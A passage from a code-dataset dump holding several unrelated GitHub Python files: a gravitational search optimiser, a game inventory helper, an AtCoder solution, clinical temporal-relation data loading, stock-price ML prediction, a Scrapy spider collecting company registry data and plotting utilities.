RegexExtraInfo.END_OF_WORD\n\n}\n","repo_name":"steynvl/reggy","sub_path":"server/reggy/reggy/samples/utils/regex_info_to_tok.py","file_name":"regex_info_to_tok.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"29483519705","text":"\nimport numpy as np\nimport random\nimport math\n\n# from benchmark import F16 as test\n\n''' Constant variable '''\nepsilon = 1e-5\nRATE = 20\nK_best = 50\n\nend_thres = 1e-5\n\nclass GSA():\n\n def __init__(self, g_0, dim, num, rate, k, max_iter, u_bound, l_bound, func, end_thres):\n \"\"\" Initialize GSA object \"\"\"\n self.G = g_0 + g_0 * rate # Gravity of the algorithm\n self.G_0 = g_0 # Initial Gravity of the algorithm\n self.dim = dim # Searching dimension\n self.N = num # Number of agent\n self.limit = 0.6*dim*num # Searching limit\n self.rate = rate # Decreasing rate of the gravity\n self.alpha = rate\n self.K = k # K best\n self.max_iter = max_iter # Maximum iteration\n self.K_rate = round(max_iter / 2 /num) # The decrease rate of K\n self.u_bound = u_bound # Upper bound\n self.l_bound = l_bound # Lower bound\n self.func = func # Benchmark function\n self.end_thres = end_thres # Threshold to terminate algorithm\n\n self.M = np.zeros((self.N)) # Mess of the agent\n self.m = np.zeros((self.N)) # Mess calculate by fitness\n self.Total_F = np.zeros((self.N, self.dim)) # Total force of every agent\n self.F = np.zeros((self.N, self.N, self.dim)) # Force of every agent to others\n self.X = np.zeros((self.N, self.dim)) # Position of the agent\n self.V = np.zeros((self.N, self.dim)) # Velocity\n self.A = np.zeros((self.N, self.dim)) # Acceleration\n 
self.best = 0 # The best value of fitness func.\n self.worst = 0 # The worst value of fitness func.\n self.fit = np.zeros((self.N)) # Fitness value of the agent\n self.best_sofar = 1000000000 # Record best fitness value so far\n self.best_results = np.zeros((self.max_iter)) # Fitness value of the agent\n self.best_results_so_far = np.zeros((self.max_iter)) # Fitness value of the agent\n\n self.last_iter_avg = 0 # Fitness value of the agent\n\n def evaluate(self):\n for i in range(self.N):\n result = self.func(self.X[i])\n if result != 0:\n self.fit[i] = -result\n\n\n def update_v_x_i(self, i):\n for d in range(self.dim):\n self.V[i][d] = random.random() * self.V[i][d] + self.A[i][d]\n self.X[i][d] = self.X[i][d] + self.V[i][d]\n if self.X[i][d] < self.l_bound:\n self.X[i][d] = self.l_bound\n elif self.X[i][d] > self.u_bound:\n self.X[i][d] = self.u_bound\n\n def update_v_x(self):\n for i in range(self.N):\n self.update_v_x_i(i)\n\n def update_G(self, iteration):\n # self.G = self.G - self.G * self.rate\n self.G = self.G_0 * math.exp(-self.alpha * iteration / self.max_iter)\n\n def update_M(self):\n total_mess = np.sum(self.m)\n for i in range(self.N):\n self.M[i] = self.m[i] / total_mess\n\n def update_m(self):\n tmp = (self.best - self.worst)\n if tmp == 0:\n tmp = (self.best * 1.00005) / self.worst\n for i in range(self.N):\n if self.fit[i] != self.worst:\n self.m[i] = (self.fit[i] - self.worst) / tmp\n else:\n self.m[i] = (0.0001) / tmp\n\n def update_A(self):\n for i in range(self.N):\n for d in range(self.dim):\n self.A[i][d] = self.Total_F[i][d] / self.M[i]\n\n def update_K(self, iteration):\n if self.K > 1 and iteration % self.K_rate == 0:\n self.K = self.K - 1\n\n def find_limit(self):\n self.best = self.fit[0] # The best value of fitness func.\n self.worst = self.fit[0] # The worst value of fitness func.\n for i in self.fit:\n if i > self.best:\n self.best = i\n elif i < self.worst:\n self.worst = i\n\n if self.best == -1 and self.worst == -1:\n i = 0\n\n def distance(self, a, b):\n return math.sqrt(np.sum(np.square(a-b)))\n # dis_2 = 0\n # for d in range(self.dim):\n # tmp = a[d] - b[d]\n # dis_2 = dis_2 + tmp * tmp\n # return math.sqrt(dis_2)\n\n\n def force_ijd(self, M_1, M_2, d, pre_cal):\n return pre_cal * (self.X[M_2][d] - self.X[M_1][d])\n\n def force_i(self, M_1):\n for M_2 in range(self.N):\n if M_2 > M_1:\n pre_cal = self.G * self.M[M_1] * self.M[M_2] / (self.distance(self.X[M_1], self.X[M_2]) + epsilon)\n for d in range(self.dim):\n m2_to_m1_f = self.force_ijd(M_1, M_2, d, pre_cal)\n self.F[M_1][M_2][d] = m2_to_m1_f\n self.F[M_2][M_1][d] = -m2_to_m1_f\n\n def update_f(self):\n for i in range(self.N):\n self.force_i(i)\n\n def total_force_i(self, M_i, sort_index):\n for d in range(self.dim):\n self.Total_F[M_i][d] = 0\n for i in range(self.K):\n if sort_index[i] != M_i:\n f = self.F[M_i][sort_index[i]][d]\n self.Total_F[M_i][d] = self.Total_F[M_i][d] + random.random() * self.F[M_i][sort_index[i]][d]\n\n def update_total_f(self):\n sort_index = np.argsort(self.fit)\n sort_index = np.flip(sort_index)\n for i in range(self.N):\n self.total_force_i(i, sort_index)\n\n def triger(self, iteration):\n upper = lower = self.best_results[iteration]\n if iteration > 100:\n for i in range(20):\n if upper < self.best_results[iteration - i]:\n upper = self.best_results[iteration - i]\n\n elif lower > self.best_results[iteration - i]:\n lower = self.best_results[iteration - i]\n if(upper-lower) < self.end_thres:\n self.best_results[iteration:] = self.best_results[iteration]\n 
self.best_results_so_far[iteration:] = self.best_results_so_far[iteration]\n #print(self.best_results_so_far[2000])\n return True\n else:\n return False\n\n\n def result(self, iteration):\n sort_index = np.argsort(self.fit)\n sort_index = np.flip(sort_index)\n self.best_results[iteration] = self.func(self.X[sort_index[0]])\n if self.best_sofar > self.best_results[iteration]:\n self.best_sofar = self.best_results[iteration]\n self.best_results_so_far[iteration] = self.best_sofar\n\n # if iteration == (self.max_iter-1):\n # total_agent_value = np.apply_along_axis(self.func, axis=1, arr=self.X)\n # self.last_iter_avg = np.average(total_agent_value)\n\n # print(\"Best fitness: \",self.func(self.X[sort_index[0]]) )\n print(\"Best: \",self.X[sort_index[0]], \"fitness: \", self.best_results[iteration])\n return self.triger(iteration)\n\n\n # def gsa_init(self):\n # # Initialize food source for all employed bees\n # for i in range(self.N):\n # self.X[i] = np.random.uniform(self.l_bound,self.u_bound, (self.dim))\n # self.fit[i] = self.func(self.X[i])\n\n def gsa_init(self, X=None):\n # Initialize food source for all employed bees\n if X is None:\n for i in range(self.N):\n self.X[i] = np.random.uniform(self.l_bound,self.u_bound, (self.dim))\n self.fit[i] = self.func(self.X[i])\n else:\n if X.shape == self.X.shape:\n self.X = X.copy()\n self.fit = np.apply_along_axis(self.func, axis=1, arr=self.X)\n else:\n raise Exception(\"Custom data shape error\")\n\n\n '''\n One Iteration of the gsa algorithm\n '''\n def gsa_iter(self, iteration):\n # Evaluate the fitness\n self.evaluate()\n\n # Update G\n self.update_G(iteration)\n\n # find limit\n self.find_limit()\n\n # Calculate Mess\n self.update_m()\n self.update_M()\n self.update_K(iteration)\n\n # Calculate force\n self.update_f()\n self.update_total_f()\n\n # Calculate Acceleration\n self.update_A()\n\n self.update_v_x()\n\n\n def algorithm(self, arr):\n # Initial\n self.gsa_init(arr)\n\n # iteration\n for iteration in range(self.max_iter):\n self.gsa_iter(iteration)\n end = self.result(iteration)\n if end:\n break\n\n def get_current_fitness(self):\n \"\"\" Get current fitness of each agent \"\"\"\n return np.apply_along_axis(self.func, axis=1, arr=self.X)\n\n\nif __name__ == \"__main__\":\n f7 = GSA (g_0 = 100, dim=test.dim, num=50, rate=RATE, k=K_best, max_iter=2500, u_bound=test.u_bound, l_bound=test.l_bound, func=test.func, end_thres=end_thres)\n arr = np.random.uniform(test.l_bound,test.u_bound, (50, test.dim))\n f7.algorithm(arr)\n\n # Calculate mean fitness\n fitness_array = f7.get_current_fitness()\n mean_fitness = np.mean(fitness_array)\n print(mean_fitness)","repo_name":"Ernie-Wang/IC_HW1","sub_path":"gsa.py","file_name":"gsa.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74222845537","text":"# inventory.py\nfrom utils import slow_type\nfrom colorama import init, Fore, Back, Style\n\ndef use_item(player, item_index):\n \"\"\"Use the selected item from the player's inventory.\"\"\"\n item = player.inventory[item_index]\n\n # Handle the specific logic for the item\n if 'Healing Potion' in item['name']:\n player.health += int(item['healing_amount'])\n if player.health > player.max_health:\n player.health = player.max_health\n slow_type(f\"You used a {Fore.YELLOW}{item['name']}{Fore.RESET} and restored {Fore.GREEN}{Style.BRIGHT}{item['healing_amount']}{Style.RESET_ALL} health points!\")\n # Remove the used item from the player's 
inventory\n player.inventory.pop(item_index)\n","repo_name":"VladDoesCode/Arx-New","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"45771219621","text":"# encoding:utf-8\nimport copy\nimport numpy as np\nimport random\n\nN = int(input())\nMOD = 10**9+7\nmemo = [{} for i in range(N+1)]\n\ndef check(last4):\n for i in range(4):\n t = list(last4)\n if i >= 1:\n t[i-1],t[i] = t[i],t[i-1]\n\n if \"\".join(t).count(\"AGC\") >= 1:\n return False\n\n return True\n\ndef dfs(cur,last3):\n if last3 in memo[cur]:\n return memo[cur][last3]\n if cur == N:\n return 1\n ret = 0\n for c in \"AGCT\":\n if check(last3+c):\n ret = (ret + dfs(cur+1,last3[1:]+c))%MOD\n memo[cur][last3] = ret\n return ret\n\nprint(dfs(0,\"TTT\"))\n# for i in range(N):\n# print(memo[i])\n# print(memo)\n","repo_name":"seven320/AtCoder","sub_path":"122/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8295635256","text":"from cec2017.functions import f3 as func\nimport numpy as np\nimport mealpy.evolutionary_based.GA as ga\nimport mealpy.evolutionary_based.DE as de\nimport mealpy.swarm_based.BeesA as ba\nimport os \n\npath = 'results'\nif not os.path.exists(path):\n os.makedirs(path)\n\nn_times = 51\nalg = func.__name__\n\ndim = int(input(\"Dimensão: \"))\nexecutions = 1000\n\nresults = []\n\ndef fit(solution):\n solution = np.reshape(solution, (1, dim))\n val = func(solution)\n\n return val\n\n \nterm_dict = {\n 'max_fe': 10000 * dim,\n}\n\nga1 = ba.CleverBookBeesA(3500,50)\nusing_alg = ga1.name\n\n\nfor i in range(0,n_times):\n\n problem = {\n \"fit_func\": fit,\n \"lb\": [-100, ] * dim,\n \"ub\": [100, ] * dim,\n \"minmax\":\"min\",\n \"n_dims\":dim,\n \"obj_weights\":np.ones(executions),\n }\n \n best_fit, best_sol = ga1.solve(problem,'thread', termination = term_dict,n_workers=6)\n \n results.append(best_sol)\n \nwith open(f'results/result_{using_alg}_{dim}_{alg}.txt','w') as compiled:\n i = 0\n for sol in results:\n compiled.write(f'Execução {i}: {sol}\\n')\n i += 1\n\n ","repo_name":"nicolassoam/comp-evol","sub_path":"trabalho-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31701933114","text":"\"\"\"Representation of clowder yaml loader\n\n.. 
codeauthor:: Joe DeCapo \n\n\"\"\"\n\nfrom typing import List, Optional\n\nfrom clowder.util.git import Protocol\n\nfrom .clowder import Clowder\nfrom .defaults import Defaults\nfrom .source import Source, SourceName\n\n\nclass ClowderBase:\n \"\"\"clowder yaml base class\n\n :ivar str name: Name of clowder\n :ivar Optional[Defaults] defaults: Name of clowder\n :ivar Optional[List[Source]] sources: Sources\n :ivar Clowder clowder: Clowder model\n :ivar Optional[Protocol] protocol: Git protocol\n \"\"\"\n\n def __init__(self, yaml: dict):\n \"\"\"Upstream __init__\n\n :param dict yaml: Parsed yaml dict\n \"\"\"\n\n self.name: str = yaml[\"name\"]\n self.defaults: Optional[Defaults] = Defaults(yaml[\"defaults\"]) if \"defaults\" in yaml else None\n self.sources: Optional[List[Source]] = None\n if \"sources\" in yaml:\n self.sources: Optional[List[Source]] = [Source(SourceName(name), source)\n for name, source in yaml[\"sources\"].items()]\n protocol = yaml.get(\"protocol\", None)\n self.protocol: Optional[Protocol] = None if protocol is None else Protocol(protocol)\n self.clowder: Clowder = Clowder(yaml[\"clowder\"])\n\n def get_yaml(self, resolved: bool = False) -> dict:\n \"\"\"Return python object representation for saving yaml\n\n :param bool resolved: Whether to get resolved commit hashes\n :return: YAML python object\n \"\"\"\n\n yaml = {\n \"name\": self.name\n }\n\n if self.protocol is not None:\n yaml['protocol'] = self.protocol.value\n if self.sources is not None:\n yaml['sources'] = {s.name: s.get_yaml() for s in self.sources}\n if self.defaults is not None:\n yaml['defaults'] = self.defaults.get_yaml()\n\n yaml[\"clowder\"] = self.clowder.get_yaml(resolved=resolved)\n\n return yaml\n","repo_name":"JrGoodle/clowder","sub_path":"clowder/model/clowder_base.py","file_name":"clowder_base.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"31865469061","text":"#!/usr/bin/env python3\n\nimport sys\nsys.dont_write_bytecode = True\nsys.path.append('../Anafora')\n\nimport os, configparser, glob\nfrom tqdm import tqdm\nfrom cassis import *\n\ntype_system_path = './TypeSystem.xml'\n\nsplits = {\n 'train': set([0,1,2,3]),\n 'dev': set([4,5]),\n 'test': set([6,7])}\n\nlabel2int = {'NONE':0, 'CONTAINS':1, 'CONTAINS-1':2}\nint2label = {0:'NONE', 1:'CONTAINS', 2:'CONTAINS-1'}\n\n# ctakes type system types\nrel_type = 'org.apache.ctakes.typesystem.type.relation.TemporalTextRelation'\nevent_type = 'org.apache.ctakes.typesystem.type.textsem.EventMention'\ntime_type = 'org.apache.ctakes.typesystem.type.textsem.TimeMention'\nsent_type = 'org.apache.ctakes.typesystem.type.textspan.Sentence'\n\ndef index_relations(gold_view):\n \"\"\"Map arguments to relation types\"\"\"\n\n rel_lookup = {}\n\n for rel in gold_view.select(rel_type):\n arg1 = rel.arg1.argument\n arg2 = rel.arg2.argument\n\n if rel.category == 'CONTAINS':\n rel_lookup[(arg1, arg2)] = rel.category\n\n return rel_lookup\n\ndef get_context(sent, larg, rarg, lmarker, rmarker):\n \"\"\"Build a context string using left and right arguments and their markers\"\"\"\n\n sent_text = sent.get_covered_text()\n left_text = larg.get_covered_text()\n right_text = rarg.get_covered_text()\n\n left_context = sent_text[: larg.begin - sent.begin]\n middle_context = sent_text[larg.end - sent.begin : rarg.begin - sent.begin]\n right_context = sent_text[rarg.end - sent.begin :]\n\n left_start = ' [s%s] ' % lmarker\n left_end = ' [e%s] ' % lmarker\n 
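 # Added note: the [s*]/[e*] tokens mark the two relation arguments for the\n # downstream encoder; e.g. with lmarker='t' and rmarker='e' a sentence is\n # rendered roughly as '... [st] last week [et] she had [se] surgery [ee] ...'\n # (the example text is illustrative only).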
right_start = ' [s%s] ' % rmarker\n right_end = ' [e%s] ' % rmarker\n\n context = left_context + left_start + left_text + left_end + \\\n middle_context + right_start + right_text + \\\n right_end + right_context\n\n return context.replace('\\n', '')\n\nclass RelData:\n \"\"\"Make x and y from XMI files for train, dev, or test partition\"\"\"\n\n def __init__(\n self,\n xmi_dir,\n partition='train',\n n_files='all'):\n \"\"\"\"Xml ref and out dirs would typically be given for a test set\"\"\"\n\n self.xmi_dir = xmi_dir\n self.partition = partition\n self.n_files = None if n_files == 'all' else int(n_files)\n\n def event_time_relations(self):\n \"\"\"Make x, y etc. for a specified partition\"\"\"\n\n texts = []\n labels = []\n\n type_system_file = open(type_system_path, 'rb')\n type_system = load_typesystem(type_system_file)\n\n xmi_paths = glob.glob(self.xmi_dir + '*.xmi')[:self.n_files]\n caption = 'reading %s data' % self.partition\n for xmi_path in tqdm(xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = index_relations(gold_view)\n\n # iterate over sentences, extracting relations\n for sent in sys_view.select(sent_type):\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n label = 'NONE'\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n if (event, time) in rel_lookup:\n label = rel_lookup[(event, time)] + '-1'\n\n if time.begin < event.begin:\n context = get_context(sent, time, event, 't', 'e')\n else:\n context = get_context(sent, event, time, 'e', 't')\n\n texts.append(context)\n labels.append(label2int[label])\n\n return texts, labels\n\nif __name__ == \"__main__\":\n\n cfg = configparser.ConfigParser()\n cfg.read(sys.argv[1])\n base = os.environ['DATA_ROOT']\n\n rel_data = RelData(\n os.path.join(base, cfg.get('data', 'xmi_dir')),\n partition='train',\n n_files=10)\n\n inputs, labels = rel_data.event_time_relations()\n\n import collections\n print('unique labels:', collections.Counter(labels))\n\n # print a few 'contains' samples\n for input, label in zip(inputs, labels):\n if label == 1:\n print(input)\n","repo_name":"dmitriydligach/Thyme","sub_path":"Et/reldata.py","file_name":"reldata.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74023991457","text":"import pandas as pd\r\nimport plotly.graph_objs as go\r\nimport plotly.express as px\r\nimport pickle\r\nimport numpy as np\r\nimport yfinance as yf\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, explained_variance_score, r2_score\r\nfrom sklearn.metrics import mean_poisson_deviance, mean_gamma_deviance, accuracy_score\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.svm import SVR\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n# cred = credentials.Certificate(\"key.json\")\r\n# firebase_admin.initialize_app(cred)\r\n\r\n\r\ndef crypt_data(coin, start_date, end_date):\r\n cryptData = yf.download(coin, 
start=start_date, end=end_date, group_by=\"ticker\")\r\n return cryptData\r\n\r\n\r\ndef trainModelForStock(coin='AAPL', start_date=\"1990-01-01\", end_date=\"2022-12-31\",\r\n models=RandomForestRegressor(random_state=0), type_model='ml'):\r\n try:\r\n # Get Data\r\n data = crypt_data(coin, start_date, end_date)\r\n\r\n # Fill Empty Data by interpolation\r\n data = data.fillna(method='ffill')\r\n\r\n # Split Data\r\n x = data.drop(['Close'], axis=1).values\r\n y = data.Close\r\n\r\n scalery = MinMaxScaler(feature_range=(0, 1))\r\n y = scalery.fit_transform(np.array(y).reshape(-1, 1))\r\n\r\n model_name1 = coin + \"_scalery.sav\"\r\n pickle.dump(scalery, open(model_name1, 'wb'))\r\n\r\n if type_model == 'ml':\r\n # Train Model\r\n models.fit(x, y.ravel())\r\n print(\"Model Trained\")\r\n model_name = coin + \"_Model.sav\"\r\n pickle.dump(models, open(model_name, 'wb'))\r\n return models\r\n\r\n except:\r\n print(\"Error Occurred, check Inputs and train again.\")\r\n return None\r\n\r\n\r\ndef predictionModel(coin_stock, model, prediction_start_date, prediction_end_date,scmodely):\r\n p_data = crypt_data(coin_stock, prediction_start_date, prediction_end_date)\r\n true = p_data['Close']\r\n p_data = p_data.drop('Close', axis=1)\r\n pred = model.predict(p_data)\r\n data_pred = pred.reshape(-1, 1)\r\n data_pred = scmodely.inverse_transform(data_pred)\r\n p_data['Close'] = data_pred\r\n\r\n year_data = price_per_year(p_data, coin_stock)\r\n six_data = price_per_six_month(p_data, coin_stock)\r\n return year_data, six_data, p_data\r\n\r\n\r\ndef price_per_year(data, coin):\r\n years = list(data.index.year.unique())\r\n df_year = pd.DataFrame()\r\n\r\n for year in years:\r\n year_open = data.loc[data.index.year == year, 'Open'][0]\r\n year_close = data.loc[data.index.year == year, 'Close'][-1]\r\n year_low = data.loc[data.index.year == year, 'Low'].min()\r\n year_high = data.loc[data.index.year == year, 'High'].max()\r\n\r\n df_year[year] = pd.Series([year_open, year_close, year_low, year_high])\r\n\r\n df_year = df_year.T\r\n df_year = df_year.set_axis(['open', 'close', 'low', 'high'], axis=1)\r\n\r\n # Calculate % change between the open and close price of the year\r\n df_year['Year Change'] = 100 * (df_year['close'] - df_year['open']) / df_year['open']\r\n\r\n\r\n annotations_list = []\r\n max_high = df_year['high'].max()\r\n\r\n for year in years:\r\n df_aux = df_year.loc[df_year.index == year]\r\n loc_x = pd.to_datetime(df_aux.index[0], format='%Y')\r\n loc_y = df_aux['high'].values[0] / max_high + 0.05\r\n text = '{:.1f}%'.format(df_aux['Year Change'].values[0])\r\n\r\n annotation = dict(x=loc_x, y=loc_y,\r\n xref='x', yref='paper',\r\n showarrow=False, xanchor='center',\r\n text=text)\r\n\r\n annotations_list.append(annotation)\r\n\r\n # Interactive candlestick chart with Plotly\r\n candlestick = go.Candlestick(\r\n x=pd.to_datetime(df_year.index, format='%Y'),\r\n open=df_year.open,\r\n close=df_year.close,\r\n low=df_year.low,\r\n high=df_year.high\r\n )\r\n\r\n fig = go.Figure(data=[candlestick])\r\n\r\n fig.update_layout(\r\n autosize=False,\r\n width=500,\r\n height=300,\r\n title=dict(text=coin + '/USD yearly chart', font=dict(size=18)),\r\n yaxis_title=dict(text='Price (USD)', font=dict(size=13)),\r\n margin=dict(l=0, r=20, t=55, b=20),\r\n xaxis_rangeslider_visible=False,\r\n annotations=annotations_list,\r\n paper_bgcolor='rgba(0, 0, 0, 0)'\r\n\r\n )\r\n fig.show()\r\n\r\n return df_year\r\n\r\n\r\ndef price_per_six_month(data, coin):\r\n data['Date'] = 
pd.to_datetime(data.index)\r\n data['Month'] = data.Date.dt.month\r\n years = list(data.index.year.unique())\r\n months = list(data.Month.unique())\r\n df_month = pd.DataFrame()\r\n try:\r\n for year in years:\r\n months_open = data.loc[(data.index.year == year) & (data.Month == 6), 'Open'][0]\r\n months_close = data.loc[(data.index.year == year) & (data.Month == 6), 'Close'][-1]\r\n months_low = data.loc[(data.index.year == year) & (data.Month == 6), 'Low'].min()\r\n months_high = data.loc[(data.index.year == year) & (data.Month == 6), 'High'].max()\r\n\r\n df_month[year] = pd.Series([months_open, months_close, months_low, months_high])\r\n\r\n df_month = df_month.T\r\n df_month = df_month.set_axis(['open', 'close', 'low', 'high'], axis=1)\r\n\r\n # Calculate % change between the open and close price of the 6th month\r\n df_month['Sixth Month Change'] = 100 * (df_month['close'] - df_month['open']) / df_month['open']\r\n\r\n\r\n return df_month\r\n\r\n except Exception as e:\r\n print(e)\r\n return 0\r\n\r\n\r\n# Train Model Configuration\r\ncoin_list = [\"BTC-USD\", \"ETH-USD\", \"GOOG\", \"TSLA\", \"AAPL\", \"MSFT\", \"AMZN\"]\r\nfor coin_stock in coin_list:\r\n print(\"Training Coin\", coin_stock)\r\n model = SVR(kernel='rbf', C=1e2, gamma=0.1)\r\n start_date = '1990-01-01'\r\n type_model = 'ml'\r\n print(trainModelForStock.__doc__)\r\n model_train = trainModelForStock(coin=coin_stock, start_date=start_date, models=model, type_model=type_model)\r\n\r\n# Prediction Configuration\r\n\r\nprediction_start_date = '2021-01-01'\r\nprediction_end_date = '2022-01-01'\r\n\r\nmodel_list = [\"BTC-USD_Model.sav\", \"ETH-USD_Model.sav\", \"GOOG_Model.sav\", \"TSLA_Model.sav\", \"AAPL_Model.sav\", \"MSFT_Model.sav\", \"AMZN_Model.sav\"]\r\nscaler_list = [\"BTC-USD_scalery.sav\", \"ETH-USD_scalery.sav\", \"GOOG_scalery.sav\", \"TSLA_scalery.sav\", \"AAPL_scalery.sav\", \"MSFT_scalery.sav\", \"AMZN_scalery.sav\"]\r\n\r\nfor i in range(len(model_list)):\r\n model = pickle.load(open(model_list[i], 'rb'))\r\n scy = pickle.load(open(scaler_list[i], 'rb'))\r\n\r\n print(predictionModel.__doc__)\r\n print(\"Prediction for Model\", model_list[i])\r\n year, sixth, prediction = predictionModel(coin_stock, model, prediction_start_date, prediction_end_date, scy)\r\n print(year)\r\n print(sixth)\r\n print(prediction)\r\n","repo_name":"emmad241/ftt-mobile","sub_path":"MLAlgorithm.py","file_name":"MLAlgorithm.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16829095399","text":"# -*- coding: utf-8 -*-\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom enterprise.items import EnterpriseItem\nfrom utils.base_tools import gen_md5, get_now_datetime\n\n\nclass QymSpider(CrawlSpider):\n name = 'qym_full'\n allowed_domains = ['qichamao.com']\n start_urls = ['https://www.qichamao.com']\n\n # 设置解析link的规则,callback是指解析link返回的响应数据的的方法\n rules = [\n Rule(\n LinkExtractor(\n allow='.*?orgcompany/searchitemdtl.*?',\n allow_domains='qichamao.com'\n ),\n callback='erp_parse', follow=True\n ),\n ]\n\n @staticmethod\n def erp_parse(response):\n \"\"\" 这个函数是解析的主函数\n :param response:\n :return:\n \"\"\"\n # 页面主要���息\n page_main_info = response.xpath(\n '*//ul[@class=\"art-basic\"]/li'\n '|*//ul[@class=\"art-basic art-basic-swot\"]/li'\n )\n\n item_dict = dict()\n for li in page_main_info:\n type_name = str(li.xpath(\n 'span[@class=\"tit\"]/text()'\n ).extract_first()).strip()\n\n 
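 # Added note: the xpath('string(.)') call below returns the concatenated\n # text of the span node and all of its descendants, so a value split\n # across nested child tags still comes back as a single string.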
type_value = str(li.xpath(\n 'span[@class=\"info\"]'\n ).xpath('string(.)').extract_first()).strip()\n\n item_dict[type_name] = type_value\n\n erp_info_dict = dict()\n # 企业基本信息\n erp_info_dict['erp_code'] = item_dict.get('统一社会信用代码:')\n erp_info_dict['taxpayers_code'] = item_dict.get('纳税人识别号:')\n erp_info_dict['registration_number'] = item_dict.get('注册号:')\n erp_info_dict['organization_code'] = item_dict.get('机构代码:')\n erp_info_dict['name'] = item_dict.get('名称:')\n erp_info_dict['legal_representative'] = item_dict.get('法定代表人:')\n erp_info_dict['erp_type'] = item_dict.get('企业类型:')\n erp_info_dict['erp_status'] = item_dict.get('经营状态:')\n erp_info_dict['registered_cap'] = item_dict.get('注册资本:')\n erp_info_dict['establish_date'] = item_dict.get('成立日期:')\n erp_info_dict['region'] = item_dict.get('所属地区:')\n erp_info_dict['approved_date'] = item_dict.get('核准日期:')\n erp_info_dict['business_scope'] = item_dict.get('经营范围:')\n\n # 行业标签\n erp_info_dict['industry'] = item_dict.get('所属行业:')\n erp_info_dict['forward_label'] = item_dict.get('前瞻标签:')\n erp_info_dict['exhibition_label'] = item_dict.get('展会标签:')\n\n # 额外的基础信息\n erp_info_dict['source_link_url'] = response.url\n erp_info_dict['html_body'] = response.body\n erp_info_dict['pk_md5'] = gen_md5(response.url)\n erp_info_dict['update_time'] = get_now_datetime()\n\n # 返回企业信息\n erp_item = EnterpriseItem()\n erp_item['table_name'] = 'qym_erp_info'\n erp_item['data_rows'] = [erp_info_dict]\n yield erp_item\n","repo_name":"parker-pu/enterprise","sub_path":"scrapy/enterprise/enterprise/spiders/qym_full.py","file_name":"qym_full.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38868838246","text":"import pandas as pd\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib.ticker import StrMethodFormatter\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nTARGET = 'aug.road_type'\r\nseq_len = 30\r\nstep = 30\r\ndata_path = '..\\\\data_SHRP2\\\\windows\\\\all_targets\\\\labeled_sequence_win_' + str(step) + '_seq_' + str(seq_len) \\\r\n + '_new_multi_no_clean.csv'\r\n# data_path = '..\\\\data_SHRP2\\\\windows\\\\aug.road_type\\\\labeled_sequence_win_10_seq_30.csv'\r\n\r\n\r\n\r\n\r\ndef disply_hist(data, col):\r\n print(col)\r\n ax = data.hist(column=col, bins=25, grid=False, figsize=(12, 8), color='#86bf91', zorder=2, rwidth=0.9)\r\n ax = ax[0]\r\n for x in ax:\r\n\r\n # Despine\r\n x.spines['right'].set_visible(False)\r\n x.spines['top'].set_visible(False)\r\n x.spines['left'].set_visible(False)\r\n\r\n # Switch off ticks\r\n x.tick_params(axis=\"both\", which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\",\r\n labelleft=\"on\")\r\n\r\n # Draw horizontal axis lines\r\n vals = x.get_yticks()\r\n for tick in vals:\r\n x.axhline(y=tick, linestyle='dashed', alpha=0.4, color='#eeeeee', zorder=1)\r\n\r\n # Remove title\r\n # x.set_title()\r\n\r\n # Set x-axis label\r\n x.set_xlabel(\"\", labelpad=20, weight='bold', size=12)\r\n\r\n # Set y-axis label\r\n x.set_ylabel(\"\", labelpad=20, weight='bold', size=12)\r\n\r\n # Format y-axis label\r\n x.yaxis.set_major_formatter(StrMethodFormatter('{x:,g}'))\r\n\r\ndef disply_hist_1(data, coll):\r\n # An \"interface\" to matplotlib.axes.Axes.hist() method\r\n import matplotlib.pyplot as plt\r\n d = data[col]\r\n n, bins, patches = plt.hist(x=d.dropna().values, bins='auto', color='#0504aa',\r\n alpha=0.7, rwidth=0.85)\r\n plt.grid(axis='y', 
